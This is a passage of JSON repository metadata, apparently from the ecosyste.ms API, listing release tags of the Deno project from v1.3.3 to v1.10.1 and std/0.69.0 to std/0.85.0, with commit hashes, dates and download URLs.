deno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/de